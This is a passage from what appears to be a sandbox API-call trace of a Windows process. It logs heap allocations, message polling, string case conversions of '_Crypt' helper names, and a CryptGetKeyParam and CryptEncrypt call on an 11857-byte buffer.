(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0033.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.534] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2b8 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc70 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.535] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.535] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0033.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.536] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0033.537] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17d8 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.537] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0033.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.538] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.539] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.539] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.540] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.540] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.541] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.541] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da238, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da238*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.541] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.541] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.541] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.541] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0033.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.541] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.541] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.541] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.541] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.541] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.542] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.542] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.542] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.542] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0033.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.542] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.542] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x2e41, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x2e50) returned 1 [0033.542] CharLowerBuffW (in: lpsz="byte[11857]", cchLength=0xb | out: lpsz="byte[11857]") returned 0xb 